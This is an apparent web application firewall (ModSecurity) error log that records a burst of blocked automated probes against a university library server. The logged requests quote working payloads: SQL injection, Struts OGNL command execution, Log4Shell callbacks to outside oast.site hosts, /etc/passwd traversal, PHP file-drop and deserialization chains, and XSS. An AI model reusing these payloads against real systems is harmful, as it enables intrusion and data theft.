[Tue Aug 29 11:34:57.318262 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ccCo-f0AAASI0E0AAAAG"]
[Tue Aug 29 11:34:57.329694 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUDQTcAAAA7"]
[Tue Aug 29 11:34:57.395425 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAASHh9EAAAAD"]
[Tue Aug 29 11:34:58.357866 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAASHh9MAAAAD"]
[Tue Aug 29 11:34:58.381628 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAASI0E8AAAAG"]
[Tue Aug 29 11:34:59.344856 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAAUR84kAAABI"]
[Tue Aug 29 11:35:01.347094 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATzVJIAAAAx"]
[Tue Aug 29 11:35:02.324401 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUUZ80AAABK"]
[Tue Aug 29 11:35:02.345443 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATge6sAAAAl"]
[Tue Aug 29 11:35:03.335203 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAUZcGMAAABO"]
[Tue Aug 29 11:35:03.344401 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAATxvZIAAAAw"]
[Tue Aug 29 11:35:04.321088 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAPLwKUAAAAX"]
[Tue Aug 29 11:35:04.401373 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAATPtTIAAAAM"]
[Tue Aug 29 11:35:05.312412 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgxcppo5tttyt1n.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAATWYSMAAAAa"]
[Tue Aug 29 11:35:05.316992 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlg4iswjhg6t3piy.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAATzVJYAAAAx"]
[Tue Aug 29 11:35:06.361105 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgbahtqpi7ozoiq.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgbahtqpi7ozoiq.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUQ7s8AAABH"]
[Tue Aug 29 11:35:07.319251 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAASEJYsAAAAE"]
[Tue Aug 29 11:35:07.341518 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAATSkogAAAAT"]
[Tue Aug 29 11:35:08.350365 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAUbg1sAAABQ"]
[Tue Aug 29 11:35:09.345398 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAASOUqoAAAAR"]
[Tue Aug 29 11:35:10.348122 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAVRxdYAAAAQ"]
[Tue Aug 29 11:35:10.350076 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAATOA-AAAAAH"]
[Tue Aug 29 11:35:10.352858 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAARdiT4AAAAK"]
[Tue Aug 29 11:35:12.325318 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAAPLwLAAAAAX"]
[Tue Aug 29 11:35:12.364003 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATUxSsAAAAW"]
[Tue Aug 29 11:35:12.474202 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVRxdoAAAAQ"]
[Tue Aug 29 11:35:12.747786 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVRxdoAAAAQ"]
[Tue Aug 29 11:35:13.363956 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAASHh@MAAAAD"]
[Tue Aug 29 11:35:14.314574 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAATUxTAAAAAW"]
[Tue Aug 29 11:35:14.375453 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAVWQAoAAAAV"]
[Tue Aug 29 11:35:16.244079 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "perpustakaan.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVoCAIAAAAY"]
[Tue Aug 29 11:35:16.367181 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAVPX34AAAAF"]
[Tue Aug 29 11:35:16.372184 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAATWYTsAAAAa"]
